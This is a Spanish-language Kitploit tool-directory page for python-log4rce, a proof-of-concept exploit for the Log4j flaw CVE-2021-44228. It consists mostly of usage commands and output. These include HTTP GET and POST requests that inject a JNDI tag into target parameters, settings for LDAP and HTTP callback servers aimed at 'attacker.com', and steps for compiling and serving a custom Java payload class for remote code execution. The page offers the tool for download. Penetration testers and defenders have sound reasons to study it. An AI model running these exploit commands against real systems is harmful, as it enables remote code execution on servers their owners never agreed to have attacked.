Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
python-log4rce — Un PoC de Python puro todo en uno para CVE-2021-44228 | Kitploit
Herramientas/GitHubGitHub/alexandre-lavoie/python-log4rce
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y Control
GitHubalexandre-lavoie/python-log4rce

python-log4rce

Un PoC de Python puro todo en uno para CVE-2021-44228

Ver Repositorio
178292hace 4 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Python Log4RCE

Un PoC (prueba de concepto) integral en Python puro para CVE-2021-44228.

Ejemplo

root@kitploit:~
> python3 log4rce.py --target "linux" --payload "PAYLOAD" http -X POST --url "http://localhost:8080/" --data "address=###"
root@kitploit:~
INFO:HTTP:Running on local port 1337
INFO:HTTP:Remote target is http://127.0.0.1:1337/LinuxExploit.class
INFO:LDAP:Running on local port 1387
INFO:Log4J:Sending payload to http://localhost:8080/
INFO:LDAP:Query from ('127.0.0.1', 42554)
INFO:HTTP:Request from ('127.0.0.1', 55328) to /LinuxExploit.class
INFO:Log4J:Done!

Uso

Esta es una herramienta de línea de comandos. Todas las opciones se encuentran en el menú de ayuda:

root@kitploit:~
python3 log4rce.py --help

La lista es bastante extensa, por lo tanto, lo siguiente le dará un resumen de la funcionalidad.

Modos de Ataque

La herramienta le permite usar algunos modos de ataque. Estos ataques son extensiones de la clase Log4RCE.

HTTP

Puede realizar un ataque automatizado de solicitudes HTTP en una URL objetivo.

Puede realizar una solicitud GET de la siguiente manera:

root@kitploit:~
python3 log4rce.py http --url "http://www.vuln.com:1234/?vuln_param=###&param=123" --headers="P1=123&P2=123"

Puede realizar una solicitud POST de la siguiente manera:

root@kitploit:~
python3 log4rce.py http -X POST --url "http://www.vuln.com:1234/" --data "vuln_param=###&param=123" --headers="P1=123&P2=123"

Lo anterior inyectará la etiqueta JNDI en ###.

Manual

Si no puede usar ninguno de los anteriores, use este modo para volcar la etiqueta JDNI:

root@kitploit:~
python3 log4rce.py manual

Configuración de Red

La herramienta permite una amplia personalización para la mayoría de la configuración de red. Todos los servidores internos pueden modificarse para apuntar a diferentes ubicaciones según la configuración remota.

Servidor HTTP

Puede configurar el servidor HTTP usando los siguientes parámetros:

root@kitploit:~
python3 log4rce.py --http_port 1234 --http_rport 12345 --http_host "attacker.com"
root@kitploit:~
http_port: El puerto local para ejecutar el servidor.
http_rport: El puerto al que accede una máquina remota.
http_host: El nombre de host/IP al que accede una máquina remota.

Servidor LDAP

Puede configurar el servidor LDAP usando los siguientes parámetros:

root@kitploit:~
python3 log4rce.py --ldap_port 1234 --ldap_rport 12345 --ldap_host "attacker.com"
root@kitploit:~
ldap_port: El puerto local para ejecutar el servidor.
ldap_rport: El puerto al que accede una máquina remota.
ldap_host: El nombre de host/IP al que accede una máquina remota.

Personalización

La herramienta permite manejar cierta personalización. Lo siguiente enumera algunas funcionalidades que pueden interesarle.

Inyectar Carga Útil

Puede inyectar una carga útil en la clase Java usando:

root@kitploit:~
python3 log4rce.py --payload "PAYLOAD"

La carga útil se inyectará en las cadenas "###".

Carga Útil Java Personalizada

Puede construir su propia clase Java usando lo siguiente.

root@kitploit:~
javac -source 1.7 -target 1.7 /path/to/Exploit.java

El archivo .class resultante se puede ejecutar usando:

root@kitploit:~
python3 log4rce.py --java_class "/path/to/Exploit.class" ...

Nota: Puede agregar una cadena "###" para permitir la inyección de carga útil.

Descargar herramienta